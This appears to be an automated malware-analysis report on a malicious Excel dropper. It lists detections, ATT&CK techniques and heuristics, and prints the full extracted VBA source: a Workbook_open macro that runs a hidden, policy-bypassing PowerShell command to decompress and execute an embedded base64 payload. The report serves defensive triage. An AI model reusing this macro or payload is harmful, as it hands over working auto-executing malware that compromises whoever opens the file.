MALICIOUS
306
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The sample is an Excel file containing a Workbook_Open VBA macro that utilizes a Shell() call to execute a PowerShell command. The macro concatenates a large, obfuscated string which is likely a base64 encoded payload. This payload is then passed to powershell.exe, indicating the intent to download and execute a second-stage payload.
Heuristics 10
-
ClamAV: Xls.Dropper.Agent-7010572-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7010572-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
If Environ("PROCESSOR_ARCHITECTURE") = "x86" Then Shell (exec32) Else -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
exec32 = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm" exec32 = exec32 + "and ""Invoke-Expression $(New-Object IO.StreamRe" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True 'Uncomment the appropriate line below. Document_open for Word and Workbook_open for excel 'Sub Document_open() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True 'Uncomment the appropriate line below. Document_open for Word and Workbook_open for excel 'Sub Document_open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
exec64 = Environ("WINDIR") + "\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm" exec64 = exec64 + "and ""Invoke-Expression $(New-Object IO.StreamRe" -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3183 bytes |
SHA-256: 8a0d6546c09d7d04a3fb9a00d7054cf15ab2db7f52f66eb19faee9632af0fdd2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Uncomment the appropriate line below. Document_open for Word and Workbook_open for excel
'Sub Document_open()
Sub Workbook_open()
Dim exec32 As String
Dim exec64 As String
Dim str As String
str = "nVRtb9pIEP7OrxhZe5KtYMcELi9YkUpJc81doTSkSe8QOi32gLesd531OoFQ/nvHxEfo1/vi9Yxn53lm5hmzR7iEd05jciXlTZZrY11niUahbJ8EiZSON4W8nEkRQ2G5pQNXlr7DjbIja+BeGFty2ZNSx27tk3kvSQwWRRNKoSwkz2PxgrUxf42lVFrdrfM398hoi7H1"
str = str + "ov/NpW+QW7xL6UjeuLzaPWuNmJUWD0hZHi9fme2DyWfsnv3ePeKGZ0hY+8s7LCrhWvLFYeQr2k1CZTjvGtasNyyhDju99/2rD9d/fLz5869Pg+Hn0Zfb8d3X+4dvf//DZ3GC80Uqvi9lpnT+aApbPj2v1i9h66Td+f307PzCCe50P+WmZwxfu15jXqq4QofYZU/eBgza"
str = str + "kvrguhNiN5lOgT39egN+wAB5URr0P8++U5vBH5eZF9ADfoNw1QpD8PERLk687Vt2Cxs2r9g7USsI2j/mmoqLU1/vUtC3o0tgycRdoPUNV4nOwM/4SmSUlSXBJ1QLm3rTbVTzY/PoIDvCBnKjY2o1bCa8IjplK4KjxxGwf7cRoEqIworYF6SGGhc2rsLn/4zbHa4XKNKC"
str = str + "6223BwCLDRBjcJm4DCMmwJcWTjv0dnTkbVhKSDZiywowIQSMAOoC6YoEQXyXFFdUAWnFSEYg5uBSzwvPg33XKYJga8O5ePr21aEyJ0O0wRjNk4hxpGksA674As202628aPporJgL2gS851IkOzn1uZQzkiVhbpg1JW4jlpExpILrwY3XhcUsqNI/4KwvBSobNVgWfCTh"
str = str + "oSkCkq/rlAUan/CUdZrgDPSLkJIfd4KQ+OssJ7CZpIoH45sPcBq0IngQ1MfnAoZ3nuNFTBHoIoLJ+7XFnaDyqg1ZcKWfldQ8ueKWu05qbV50j487YdDqtIPWOaU6O+t2Ou1jphzwGkzTNSLkV6tO4sBshuYK50KJ3YjYI/hDWi1wCL994oCvyCpyHiPsPNf1MAvwc14U"
str = str + "NjVlg60ume52f/n1hE2W14Jrhqt2GIZ0dEIvmtT9ui2VFRkGtKlodF5PpggG3BQplzSWvs7XLsubEDZh8rrQU5etaJHIaJ+4nteEPUhVGl05/OMQYpOtmtURVgunS+urUpJqdn8VfywRc9o7jDXJ+vy0E4Zbmn6cbrY/AQ=="
exec32 = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec32 = exec32 + "and ""Invoke-Expression $(New-Object IO.StreamRe"
exec32 = exec32 + "ader ($(New-Object IO.Compression.DeflateStream "
exec32 = exec32 + "($(New-Object IO.MemoryStream (,$([Convert]::Fro"
exec32 = exec32 + "mBase64String(\"" " & str & " \"" )))), [IO.Comp"
exec32 = exec32 + "ression.CompressionMode]::Decompress)), [Text.En"
exec32 = exec32 + "coding]::ASCII)).ReadToEnd();"""
exec64 = Environ("WINDIR") + "\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec64 = exec64 + "and ""Invoke-Expression $(New-Object IO.StreamRe"
exec64 = exec64 + "ader ($(New-Object IO.Compression.DeflateStream "
exec64 = exec64 + "($(New-Object IO.MemoryStream (,$([Convert]::Fro"
exec64 = exec64 + "mBase64String(\"" " & str & " \"" )))), [IO.Comp"
exec64 = exec64 + "ression.CompressionMode]::Decompress)), [Text.En"
exec64 = exec64 + "coding]::ASCII)).ReadToEnd();"""
If Environ("PROCESSOR_ARCHITECTURE") = "x86" Then
Shell (exec32)
Else
Shell (exec64)
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.